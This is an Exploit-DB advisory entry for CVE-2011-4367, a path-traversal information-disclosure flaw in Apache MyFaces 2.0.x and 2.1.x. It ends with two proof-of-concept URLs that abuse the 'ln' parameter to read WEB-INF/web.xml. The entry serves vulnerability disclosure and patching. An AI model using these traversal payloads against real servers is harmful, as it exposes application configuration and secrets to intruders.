Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability

2012-02-09T00:00:00
ID EDB-ID:36681
Type exploitdb
Reporter Paul Nicolucci
Modified 2012-02-09T00:00:00

Description

Apache MyFaces 'ln' Parameter Information Disclosure Vulnerability. CVE-2011-4367. Remote exploits for multiple platform

                                        
                                            source: http://www.securityfocus.com/bid/51939/info

Apache MyFaces is prone to a remote information-disclosure vulnerability.

Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.

The following versions are affected:

Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5 

http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF